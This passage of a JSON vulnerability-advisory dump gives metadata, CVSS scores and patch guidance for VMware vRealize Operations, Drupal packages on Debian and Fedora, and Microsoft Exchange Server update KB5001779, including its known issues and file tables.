[VMSA-2021-0018](<https://www.vmware.com/security/advisories/VMSA-2021-0018.html>) also include complete fixes for CVE-2021-21975. \n \n[2] vRealize Operations Manager 8.4.0 shipped with the aforementioned incomplete fixes, and is therefore partially impacted by CVE-2021-21975.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "VMSA-2021-0004.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.1.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:03", "description": "3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) \n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 8.6. \n\n3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) \n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 7.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-08-24T00:00:00", "id": "VMSA-2021-0004.2", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.2.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-22T11:42:09", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2458-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Emilio Pozuelo Monfort\nNovember 19, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nVersion : 7.52-2+deb9u12\nCVE ID : CVE-2020-13666 CVE-2020-13671\n\nTwo vulnerabilities were discovered in Drupal, a fully-featured content\nmanagement framework.\n\nCVE-2020-13666\n\n The Drupal AJAX API did not disable JSONP by default, which could\n lead to cross-site scripting.\n\n For setups that relied on Drupal's AJAX API for JSONP requests,\n either JSONP will need to be reenabled, or the jQuery AJAX API will\n have to be used instead.\n\n See the upstream advisory for more details:\n https://www.drupal.org/sa-core-2020-007\n\nCVE-2020-13671\n\n Drupal failed to sanitize filenames on uploaded files, which could\n lead to those files being served as the wrong MIME type, or being\n executed depending on the server configuration.\n\n It is also recommended to check previously uploaded files for\n malicious extensions. For more details see the upstream advisory:\n https://www.drupal.org/sa-core-2020-012\n\nFor Debian 9 stretch, these problems have been fixed in version\n7.52-2+deb9u12.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-19T11:47:17", "type": "debian", "title": "[SECURITY] [DLA 2458-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2020-11-19T11:47:17", "id": "DEBIAN:DLA-2458-1:75B9A", "href": "https://lists.debian.org/debian-lts-announce/2020/11/msg00035.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2023-06-05T15:04:23", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T01:12:43", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: drupal7-7.74-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2020-11-27T01:12:43", "id": "FEDORA:AB27730C937D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/L2D45GBUHJGSTS7WGZQZN22TVI6SSON7/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T15:04:23", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T01:24:16", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: drupal7-7.74-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2020-11-27T01:24:16", "id": "FEDORA:122DA30CBB2E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Y663FLPIX3Z3GFILDR2PBK76EFS432DO/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T18:35:35", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-15T01:22:18", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: drupal8-8.9.11-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13667", "CVE-2020-13668", "CVE-2020-13669", "CVE-2020-13670", "CVE-2020-13671", "CVE-2020-28948", "CVE-2020-28949"], "modified": "2020-12-15T01:22:18", "id": "FEDORA:C13D4309CBA7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T18:35:35", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-15T01:41:04", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: drupal8-8.9.11-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13667", "CVE-2020-13668", "CVE-2020-13669", "CVE-2020-13670", "CVE-2020-13671", "CVE-2020-28948", "CVE-2020-28949"], "modified": "2020-12-15T01:41:04", "id": "FEDORA:22650309BA59", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5KSFM672XW3X6BR7TVKRD63SLZGKK437/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-05-27T14:59:05", "description": "### *Detect date*:\n07/13/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Exchange Server 2019 Cumulative Update 10 \nMicrosoft Exchange Server 2019 Cumulative Update 9 \nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 20 \nMicrosoft Exchange Server 2019 Cumulative Update 8 \nMicrosoft Exchange Server 2016 Cumulative Update 19 \nMicrosoft Exchange Server 2016 Cumulative Update 21\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31196](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31196>) \n[CVE-2021-34470](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34470>) \n[CVE-2021-31206](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31206>) \n[CVE-2021-34473](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34473>) \n[CVE-2021-34523](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34523>) \n[CVE-2021-33766](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33766>) \n[CVE-2021-33768](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33768>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-31196](<https://vulners.com/cve/CVE-2021-31196>)6.5High \n[CVE-2021-34470](<https://vulners.com/cve/CVE-2021-34470>)5.2High \n[CVE-2021-31206](<https://vulners.com/cve/CVE-2021-31206>)7.5Critical \n[CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)7.5Critical \n[CVE-2021-33766](<https://vulners.com/cve/CVE-2021-33766>)5.0Critical \n[CVE-2021-33768](<https://vulners.com/cve/CVE-2021-33768>)5.2High\n\n### *KB list*:\n[5001779](<http://support.microsoft.com/kb/5001779>) \n[5004780](<http://support.microsoft.com/kb/5004780>) \n[5004778](<http://support.microsoft.com/kb/5004778>) \n[5004779](<http://support.microsoft.com/kb/5004779>) \n[5003611](<http://support.microsoft.com/kb/5003611>) \n[5003612](<http://support.microsoft.com/kb/5003612>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "kaspersky", "title": "KLA12224 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-33766", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-07-30T00:00:00", "id": "KLA12224", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12224/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-05-19T10:46:24", "description": "None\n**Important: **Please install the May 2021 security update. That update supersedes this security fix. For more information, see the following Exchange Team Blog article:\n\n * [Released: May 2021 Exchange Server Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * This security update rollup resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2021-28480 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28480>)\n * [CVE-2021-28481 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28481>)\n * [CVE-2021-28482 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28482>)\n * [CVE-2021-28483 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28483>)\n * [CVE-2021-34473 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523 | Microsoft Exchange Server Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)\n\n## Known issues in this update\n\n * **Known issue 1** \n \nWhen you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) might stop working. \n \nThis issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.To avoid this issue, follow these steps to manually install this security update.\n\n**Note: **This issue does not occur if you install the update through Microsoft Update.\n\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\n**Notes: **\n * Exchange services might remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition might occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n * When you block third-party cookies in a web browser, you may be continually prompted to trust a particular add-in even though you keep selecting the option to trust it. This issue occurs also in privacy window modes (such as InPrivate mode in Microsoft Edge). This issue occurs because browser restrictions prevent the response from being recorded. To record the response and enable the add-in, you must enable third-party cookies for the domain that's hosting OWA or Office Online Server in the browser settings. To enable this setting, refer to the specific support documentation for the browser.\n * **Known issue 2** \n \nAfter you install the Exchange Server April security update, cmdlets that are run through the Exchange Management Shell by using an invoked runspace might fail and return the following error message: \n\n**Note: **The syntax is not supported by this runspace. This can occur if the runspace is in no-language mode. \n\nFor more information, see [\u201cThe syntax is not supported by this runspace\u201d error after installing April 2021 Exchange security update (or later updates)](<https://support.microsoft.com/en-us/topic/-the-syntax-is-not-supported-by-this-runspace-error-after-installing-april-2021-exchange-security-update-ac2d4e97-62f6-4ad4-9dbb-0ade9b79f599>)\n * **Known issue 3** \n \nRequesting free/busy information for a user in a different forest in a trusted cross-forest topology might fail and return the following Autodiscover error message: \n\n**Note: **The remote server returned an error: (400) Bad Request.\n\nFor more information, see [\"(400) Bad Request\" error during Autodiscover for per-user free/busy in a trusted cross-forest topology](<https://support.microsoft.com/en-us/topic/-400-bad-request-error-during-autodiscover-for-per-user-free-busy-in-a-trusted-cross-forest-topology-a1d6296b-1b2b-4ecd-9ab6-d8637fe20a21>)\n * **Known issue 4** \n \nAdministrator or Service accounts that end in a dollar sign character ($) might fail when they try to connect to Exchange Management Shell or EAC. The only workaround at this time is to use accounts that don't have a dollar sign at the end of the name.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5001779>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * [Download Security Update For Exchange Server 2019 Cumulative Update 9 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=5aa2aaf7-860d-4977-acd4-82096c83c5f0>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 8 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=93809dc0-0265-4116-bc51-510ce641008b>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 20 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=b13f23a9-5603-4b13-8e16-6d35b5b33524>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 19 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=52da6d67-e0c4-4af0-a133-1e47217b6309>)\n * [Download Security Update For Exchange Server 2013 Cumulative Update 23 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=f827ff3b-194c-4470-aa8f-6cedc0d95d07>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: April 13, 2021](<https://support.microsoft.com/help/5001866>).\n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 (KB5000871)](<https://support.microsoft.com/help/5000871>)\n\n## File information\n\n### File hash information\n\nUpdate name| File name| | SHA1 hash| SHA256 hash \n---|---|---|---|--- \nExchange Server 2019 Cumulative Update 9| Exchange2019-KB5001779-x64-en.msp| | 6BF217B876381DB769BA8D4EF8FE2F1739841BDE| 557245D2B52C708A193DAAB46D35CA1683DCF1F651CC362B53DC6D7CAEB0E2F9 \nExchange Server 2019 Cumulative Update 8| Exchange2019-KB5001779-x64-en.msp| | B228041E258836DCC03B16B485DC7AA4FDDE7DC0| 58DC3AEA33E5014BCE03FC905FA59332B5C1E673F9195C646AF5F1541E33AF87 \nExchange Server 2016 Cumulative Update 20| Exchange2016-KB5001779-x64-en.msp| | 6481BC6EE060541641EE21F0368F45563C03CFD8| F428F4F667539E1D7D2F7FC5A526E699D86718990622F8724E0258F4B4107518 \nExchange Server 2016 Cumulative Update 19| Exchange2016-KB5001779-x64-en.msp| | 0368F19923C70B1824297FD333D056B5CB20AF37| 7A2DF56EC99A6DF13258360DF79C01713C19AA0D35A33FB1FC8DC2CB12669123 \nExchange Server 2013 Cumulative Update 23| Exchange2013-KB5001779-x64-en.msp| | CC0DAAE493A268E495CA7B547CB1EA2A5A7A0556| 2987759DFEDA4A2E7FCEC234938E1629A288D097E585BAAEEF40C5982DFE709A \n \n### Exchange server file information\n\nThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 9\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.858.9| 71,048| 04-Apr-2021| 08:28| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 04-Apr-2021| 08:33| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,969| 04-Apr-2021| 08:38| Not applicable \nAdemodule.dll| 15.2.858.9| 106,392| 04-Apr-2021| 08:29| x64 \nAirfilter.dll| 15.2.858.9| 42,872| 04-Apr-2021| 08:33| x64 \nAjaxcontroltoolkit.dll| 15.2.858.9| 92,568| 04-Apr-2021| 08:28| x86 \nAntispamcommon.ps1| Not applicable| 13,505| 04-Apr-2021| 08:38| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 04-Apr-2021| 08:35| Not applicable \nAsentirs.msi| Not applicable| 77,824| 04-Apr-2021| 08:33| Not applicable \nAsentsig.msi| Not applicable| 73,728| 04-Apr-2021| 08:35| Not applicable \nBigfunnel.bondtypes.dll| 15.2.858.9| 45,464| 04-Apr-2021| 08:33| x86 \nBigfunnel.common.dll| 15.2.858.9| 66,440| 04-Apr-2021| 08:30| x86 \nBigfunnel.configuration.dll| 15.2.858.9| 118,152| 04-Apr-2021| 08:31| x86 \nBigfunnel.entropy.dll| 15.2.858.9| 44,424| 04-Apr-2021| 08:30| x86 \nBigfunnel.filter.dll| 15.2.858.9| 54,160| 04-Apr-2021| 08:43| x86 \nBigfunnel.indexstream.dll| 15.2.858.9| 68,992| 04-Apr-2021| 08:32| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,168| 04-Apr-2021| 08:30| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.858.9| 19,864| 04-Apr-2021| 08:31| x86 \nBigfunnel.poi.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:33| x86 \nBigfunnel.postinglist.dll| 15.2.858.9| 189,320| 04-Apr-2021| 08:37| x86 \nBigfunnel.query.dll| 